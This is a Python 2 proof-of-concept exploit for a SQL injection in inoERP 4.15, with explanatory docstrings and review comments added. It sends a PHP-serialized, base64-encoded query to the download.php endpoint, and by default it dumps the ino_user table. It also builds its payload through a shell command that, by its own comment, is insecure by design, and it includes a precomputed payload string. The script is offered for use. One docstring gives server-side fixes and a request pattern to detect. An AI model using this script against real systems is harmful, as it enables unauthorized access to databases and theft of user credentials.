
# Exploit Title: inoERP 4.15 - 'download' SQL Injection
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: http://inoideas.org/
# Version: 4.15
# CVE: N/A
# A malicious query can be sent, base64-encoded, to the unserialize() function.
# It is then deserialized without any sanitization.
# The deserialized value is then passed directly to the SQL query.
#!/bin/python
import os
import base64
import requests
import sys
def generatePayload(query):
    """Return the base64-encoded PHP ``serialize()`` form of ``query``.

    Serialization is delegated to a local ``php`` interpreter through
    ``os.popen``: ``query`` is base64-encoded, decoded again inside the
    ``php -r`` one-liner, serialized, and base64-encoded for transport.
    The output is presumably the shape download.php's ``unserialize()``
    path expects on the ``data`` field (see the header comment and ExecSQL).

    Python 2 only: ``base64.b64encode`` returns ``str`` here, while on
    Python 3 it returns ``bytes`` and the string concatenation below raises.
    """
    #THIS FUNCTION IS INSECURE BY DESIGN
    # ``query`` is spliced into a shell command string and handed to
    # os.popen(), so any shell metacharacters in it reach the local shell.
    # The author states this is deliberate; it is not an oversight to patch.
    b64_query = base64.b64encode(query);
    return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
def ExecSQL(query):
    """POST ``query`` to ``/download.php`` and return the raw response body.

    ``query`` is sent as the ``data`` form field with ``data_type`` set to
    ``sql_query``; per the header comment the server unserializes ``data``
    without sanitization and passes it into a SQL query.

    ``ip`` is a module global assigned in the ``__main__`` block from
    ``<target>/<path>``; calling this function before that assignment
    raises ``NameError``.  The URL is built over plain ``http://``.

    NOTE(review): the request carries no ``timeout``, so a host that accepts
    the connection and never answers blocks the script indefinitely.

    Defensive reading: the server-side fix is to never ``unserialize()``
    client-supplied input and to bind query values with parameterized
    statements; a POST to download.php whose ``data_type`` is ``sql_query``
    is the request shape worth alerting on.
    """
    data = {"data":query,
            "data_type":"sql_query"}

    r = requests.post("http://" + ip + "/download.php", data=data)
    return r.content
if __name__ == "__main__":
    # Two positional arguments are required: the target host and the
    # application's base path (the example passes "ierp/").  Note that the
    # first usage line omits the second argument even though it is mandatory.
    if len(sys.argv) != 3:
        print '(+) usage: %s <target> ' % sys.argv[0]
        print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0]
        exit()

    # Module global read by ExecSQL().  Host and path are joined with "/"
    # and ExecSQL() appends "/download.php", so a path that already ends in
    # "/" (as in the example) produces a "//" in the final URL.
    ip = sys.argv[1] + "/" + sys.argv[2]

    # If no local php interpreter is available, the author's alternative is
    # to bypass generatePayload() and pass the pre-serialized constant
    # czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw== (the serialized form of
    # "select @@version;") to ExecSQL() directly, which only confirms the
    # injection rather than dumping a table.

    data = r"select * from ino_user;"

    # Response body is printed verbatim; nothing parses or validates it.
    print ExecSQL(generatePayload(data));